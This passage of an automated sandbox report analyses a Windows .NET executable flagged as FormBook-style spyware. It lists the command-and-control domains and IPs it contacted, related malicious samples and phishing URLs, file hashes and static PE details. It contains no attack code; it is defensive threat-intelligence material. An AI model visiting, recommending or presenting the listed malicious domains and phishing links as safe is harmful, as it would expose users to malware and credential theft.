                                                                                                  https://www.hover.com/?source=parkedjBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    203.161.50.127
                                                                                                    		www.quantummquest.topMalaysia
                                                                                                    		45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                    195.24.68.5
                                                                                                    		www.dhleba51.ruRussian Federation
                                                                                                    		48287RU-CENTERRUfalse
                                                                                                    153.92.8.41
                                                                                                    		cucuzeus88.storeGermany
                                                                                                    		47583AS-HOSTINGERLTfalse
                                                                                                    101.99.93.157
                                                                                                    		bnbuotqakx.shopMalaysia
                                                                                                    		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse
                                                                                                    188.116.38.155
                                                                                                    		applesolve.comPoland
                                                                                                    		43333NEPHAX-ASPLfalse
                                                                                                    148.251.36.121
                                                                                                    		vavada-band.ruGermany
                                                                                                    		24940HETZNER-ASDEfalse
                                                                                                    119.18.54.116
                                                                                                    		yamiyasheec.onlineIndia
                                                                                                    		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                    108.186.8.158
                                                                                                    		www.xxaiai.topUnited States
                                                                                                    		54600PEGTECHINCUSfalse
                                                                                                    192.250.235.36
                                                                                                    		dainikmirpur.comUnited States
                                                                                                    		36454CNSV-LLCUSfalse
                                                                                                    91.195.240.19
                                                                                                    		parkingpage.namecheap.comGermany
                                                                                                    		47846SEDO-ASDEfalse
                                                                                                    194.58.112.173
                                                                                                    		www.bettaroom.ruRussian Federation
                                                                                                    		197695AS-REGRUfalse
                                                                                                    216.40.34.41
                                                                                                    		www.whirledairlines.comCanada
                                                                                                    		15348TUCOWSCAfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                    Analysis ID:1435169
                                                                                                    Start date and time:2024-05-02 08:23:06 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 11m 8s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:8
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:2
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:yZcecBUXN7.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:9cd48f0d93c28ae6559409de23414554.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@14/12
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 75%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 85%
                                                                                                    • Number of executed functions: 67
                                                                                                    • Number of non-executed functions: 273
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    08:25:02API Interceptor6957285x Sleep call for process: netsh.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    203.161.50.127EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                                    • www.quantummquest.top/0hhg/
                                                                                                    n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.quantummquest.top/0hhg/
                                                                                                    tee030.docGet hashmaliciousFormBookBrowse
                                                                                                    • www.quantummquest.top/0hhg/
                                                                                                    Inquiries_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.titantechnologies.life/gh9e/
                                                                                                    ALL-LINK DRAFT_gz.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • www.radiantresources.xyz/9q39/
                                                                                                    fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • www.radiantresources.xyz/r6ib/
                                                                                                    KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.titantechnologies.life/gh9e/
                                                                                                    195.24.68.5EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                                    • www.dhleba51.ru/0hhg/
                                                                                                    n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.dhleba51.ru/0hhg/
                                                                                                    tee030.docGet hashmaliciousFormBookBrowse
                                                                                                    • www.dhleba51.ru/0hhg/
                                                                                                    1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • www.dhleba51.ru/im2z/
                                                                                                    X6yu1q9YBY.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.tiflovector.ru/pz6u/?3I=0G6+4PQ3ff1VVX3bDFVBtpfcw4kWSisC64ofEkjldKjfJt8rvq/jRvoecRZPqzxQYgqqDTzjiov+pqR5Wm+QQGUA/Xhr4Yy7BQ==&mwwq=HfE7zZ
                                                                                                    RUS3109Y51.exeGet hashmaliciousAveMaria, FormBook, UACMeBrowse
                                                                                                    • www.tiflovector.ru/pz6u/?sfwB4SN2=0G6+4PQ3ff1VVX3bDFVBtpfcw4kWSisC64ofEkjldKjfJt8rvq/jRvoecRZPqzxQYgqqDTzjiov+pqR5Wm+QQGUA/Xhr4Yy7BQ==&PDi=elvCeXhuDD
                                                                                                    20221111_BESES220459 Pref. San Blas_Lastres LIDL Esc#U00fazar_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • www.tiflovector.ru/egsw/?Cx5As3c=MsUxhK5SVMn6sbN5RQraZ50L2xVMhuBl1X79U/WDMQUEVM1waA1lys8+VJrWE4jc8VIhN7lo6yr3utkV+JXIHpwCKS96YU6/lA==&_T=uOhZKXe_VHo6
                                                                                                    50415 MAITE GISTAU-pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • www.tiflovector.ru/egsw/?Papk-b=MsUxhK5SVMn6sbN5RQraZ50L2xVMhuBl1X79U/WDMQUEVM1waA1lys8+VJrWE4jc8VIhN7lo6yr3utkV+JXIHpwCKS96YU6/lA==&TZZZw=5IMNFV
                                                                                                    Factura de venta 0A23000704_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • www.tiflovector.ru/egsw/?YqZ=MsUxhK5SVMn6sbN5RQraZ50L2xVMhuBl1X79U/WDMQUEVM1waA1lys8+VJrWE4jc8VIhN7lo6yr3utkV+JXIHpwCKS96YU6/lA==&0cnW=SYiyFE4YJaw0
                                                                                                    JS410Y5107.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.tiflovector.ru/pz6u/?6OPy0h=0G6+4PQ3ff1VVX3bDFVBtpfcw4kWSisC64ofEkjldKjfJt8rvq/jRvoecRZPqzxQYgqqDTzjiov+pqR5Wm+VakUq7l4M56OSDA==&zJ=_jCwo
                                                                                                    153.92.8.41n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.cucuzeus88.store/0hhg/
                                                                                                    HSBC Advice_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • www.cucuzeus88.store/avr4/
                                                                                                    DHL 986022_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • www.cucuzeus88.store/avr4/
                                                                                                    TNT Invoice 09004105_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • www.cucuzeus88.store/avr4/

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    www.quantummquest.topEMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                                    • 203.161.50.127
                                                                                                    n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 203.161.50.127
                                                                                                    tee030.docGet hashmaliciousFormBookBrowse
                                                                                                    • 203.161.50.127
                                                                                                    parkingpage.namecheap.com00389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 91.195.240.19
                                                                                                    RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 91.195.240.19
                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 91.195.240.19
                                                                                                    PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 91.195.240.19
                                                                                                    DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 91.195.240.19
                                                                                                    DHL Overdue Account Notice - 1606622076.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 91.195.240.19
                                                                                                    SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                                    • 91.195.240.19
                                                                                                    prnportccy.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • 91.195.240.19
                                                                                                    Doc 30042024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 91.195.240.19
                                                                                                    SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 91.195.240.19
                                                                                                    www.dhleba51.ruEMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                                    • 195.24.68.5
                                                                                                    n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 195.24.68.5
                                                                                                    tee030.docGet hashmaliciousFormBookBrowse
                                                                                                    • 195.24.68.5
                                                                                                    1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 195.24.68.5
                                                                                                    www.bettaroom.ruEMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                                    • 194.58.112.173
                                                                                                    n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 194.58.112.173
                                                                                                    tee030.docGet hashmaliciousFormBookBrowse
                                                                                                    • 194.58.112.173
                                                                                                    file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 194.58.112.173
                                                                                                    Scan File_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 194.58.112.173
                                                                                                    BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 194.58.112.174
                                                                                                    Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 194.58.112.174
                                                                                                    ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 194.58.112.174

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    RU-CENTERRUEMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                                    • 195.24.68.5
                                                                                                    n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 195.24.68.5
                                                                                                    tee030.docGet hashmaliciousFormBookBrowse
                                                                                                    • 195.24.68.5
                                                                                                    TC0931AC.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 31.177.76.32
                                                                                                    1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 195.24.68.5
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.16966.19531.exeGet hashmaliciousPureLog Stealer, SmokeLoaderBrowse
                                                                                                    • 195.24.68.6
                                                                                                    faithful.docGet hashmaliciousUnknownBrowse
                                                                                                    • 31.177.80.70
                                                                                                    faithful.docGet hashmaliciousUnknownBrowse
                                                                                                    • 31.177.76.70
                                                                                                    Petro Masila 105321.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 91.189.114.25
                                                                                                    PO 027371.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 91.189.114.25
                                                                                                    VNPT-AS-VNVNPTCorpVN00389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 203.161.49.193
                                                                                                    RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 203.161.46.103
                                                                                                    EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                                    • 203.161.50.127
                                                                                                    aduLTc2Dny.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 123.21.63.180
                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 203.161.46.103
                                                                                                    confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 203.161.49.193
                                                                                                    Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 203.161.49.193
                                                                                                    PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 203.161.46.103
                                                                                                    http://t.co/hcEcRRZbgBGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 203.161.38.167
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.7200.9677.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 203.161.46.103
                                                                                                    SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYhttps://huntleypc-my.sharepoint.com/:b:/g/personal/danielle_huntleyimmigration_com/ERooJelgeBtJtoGwolFuy-ABXgjI9-lBvF-LpkrNwjPN5g?e=mVIvidGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 101.99.92.115
                                                                                                    https://abpn-my.sharepoint.com/:b:/g/personal/dschmitz_abpn_org/ET9abOFPe71CirO-tp1Wae8BeSvBhHNcmWLUwRoZXg62VQ?e=Acax1hGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 101.99.92.115
                                                                                                    n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 101.99.93.157
                                                                                                    https://remotesolutiongroup-my.sharepoint.com/:b:/p/lmujica/EevxLYGIjWJKuir_Q0NJTjMBRRzXhd_wmIPDny9E2wwlDA?e=fncEqBGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 101.99.92.115
                                                                                                    https://calderamanufacturing-my.sharepoint.com/:b:/g/personal/rcuthbertson_summitsteelinc_com/EXRx7fLGAqJIpy0dNft_VNoBmqNR3C5b2tYm8DhDa2jZuQ?e=L3dfvEGet hashmaliciousUnknownBrowse
                                                                                                    • 101.99.91.206
                                                                                                    https://mewarpolytex123-my.sharepoint.com/:b:/g/personal/vikas_neema_mewarpolytex_com/EcuKXONpgCBJueK6mARkdzgBWKWYEsPlZVnvj9b8YAr_dA?e=GZh1gsGet hashmaliciousUnknownBrowse
                                                                                                    • 101.99.91.206
                                                                                                    https://sunhos-my.sharepoint.com/:b:/g/personal/mcaffrey_suncrestcare_com/EVEm8VhV9TBDp7AQUrliImYB4Kt7rXcd_m6-8qNUjxBhTA?e=P3XNTL&xsdata=MDV8MDJ8cHJpY2hhcmRzb25AY2FsdG9uLmNvbXxkM2U5ZTc1MTlkNDA0NmI2OWMzODA4ZGM2M2JhOTA4Y3w3YjU1NzU2YTg5NTg0ZWNlODFkYzVkYTZhYmRiNmE5N3wwfDB8NjM4NDk0OTAwMTUyMzMwMjUxfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=TldIbEg2OTJiSkRUS29RRElmU3dYbTBRQUlqUTBBMXZPcGlIaTlzNnlOQT0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 101.99.91.206
                                                                                                    https://netorgft3546691-my.sharepoint.com/:b:/g/personal/nicole_felthaus_mmclippers_com/EfUF1hXkwfZNuGJhx43KV34BvAUaxh5xTDD3cQCuhCEK1w?e=yOS03GGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 111.90.148.129
                                                                                                    Alumium.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    • 111.90.144.60
                                                                                                    https://keenetownhall-my.sharepoint.com/:b:/g/personal/amanda_keenetownhall_org/ESKbqbSIMj5ElsbdsfaEg7oBgkFm5H_JqS97uaySzVhJDQ?e=KMMz4yGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 101.99.75.251
                                                                                                    NEPHAX-ASPLn5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 188.116.38.155
                                                                                                    2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 188.116.38.155
                                                                                                    HDTFFrAXui.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                                                    • 91.203.133.60
                                                                                                    oOXIv15Q0s.exeGet hashmaliciousRemcosBrowse
                                                                                                    • 188.116.23.142
                                                                                                    vN2gDDbcxM.exeGet hashmaliciousRedLineBrowse
                                                                                                    • 188.116.21.141
                                                                                                    https://deepakroadlines.in/styles?i3=5mmdc://t987-h91k7o-ulwvpvlzu.w.lg8o7cmlm4slddc.37m?4c=dGFyYS5sYWZlcmxhQGdlbGl0YS5jb20=Get hashmaliciousUnknownBrowse
                                                                                                    • 91.203.134.140
                                                                                                    host.dllGet hashmaliciousIcedIDBrowse
                                                                                                    • 37.252.6.77
                                                                                                    4Z5TqiULwM.oneGet hashmaliciousIcedIDBrowse
                                                                                                    • 37.252.6.77
                                                                                                    pixel.dllGet hashmaliciousIcedIDBrowse
                                                                                                    • 37.252.6.77
                                                                                                    pixel.dllGet hashmaliciousIcedIDBrowse
                                                                                                    • 37.252.6.77
                                                                                                    AS-HOSTINGERLTn5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 153.92.8.41
                                                                                                    Ro8zgGY3GZ.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                    • 46.17.175.113
                                                                                                    https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3YffzGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 31.170.163.25
                                                                                                    https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3YffzGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 31.170.163.25
                                                                                                    https://exodontia.infoGet hashmaliciousUnknownBrowse
                                                                                                    • 153.92.6.142
                                                                                                    https://funcallback.comGet hashmaliciousUnknownBrowse
                                                                                                    • 153.92.6.142
                                                                                                    http://myidealwedding.com.auGet hashmaliciousBitRAT, HTMLPhisherBrowse
                                                                                                    • 185.28.20.235
                                                                                                    POP GA_vc0mmr2.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 45.84.206.132
                                                                                                    HSBC Advice_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • 153.92.8.41
                                                                                                    DHL 986022_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • 153.92.8.41

                                                                                                    JA3 Fingerprints

                                                                                                    No context

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yZcecBUXN7.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\yZcecBUXN7.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):706
                                                                                                    Entropy (8bit):5.349842958726647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
                                                                                                    MD5:9BA266AD16952A9A57C3693E0BCFED48
                                                                                                    SHA1:5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
                                                                                                    SHA-256:A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
                                                                                                    SHA-512:678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                    C:\Users\user\AppData\Local\Temp\1-00F23L

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114688
                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.622095379937431
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    File name:yZcecBUXN7.exe
                                                                                                    File size:631'808 bytes
                                                                                                    MD5:9cd48f0d93c28ae6559409de23414554
                                                                                                    SHA1:a6a625d2dce72bf9f7deee747c95ed7f7cf36cd0
                                                                                                    SHA256:3ed0095ee2de05e81ac2c954eb0df312d6b919d871b60ce4265acd266be09d3c
                                                                                                    SHA512:1204b683f15e89bb0f09b1be5fd3a18afbe83c72e95023cc58864924bec0f2dd3f228983365f654e22e822e7c0438c0b4d37660b8e2d875881ab859a488f4c34
                                                                                                    SSDEEP:12288:vDo1nsbnnnnncQlbt7WD31NYfr2S+K/WKBGEnnnnnnnnnnnnnnnnnnnnnnnnnnnO:LAnsbnnnnnXtaDFNYjnTzBNnnnnnnnnU
                                                                                                    TLSH:5DD4E03D9BD84A39D9AFCB3BD0F05911F632F2E2158AD34E5095A3B91D07790EA0235B
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.................0.................. ........@.. ....................................@................................

                                                                                                    File Icon

                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x49b6de
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
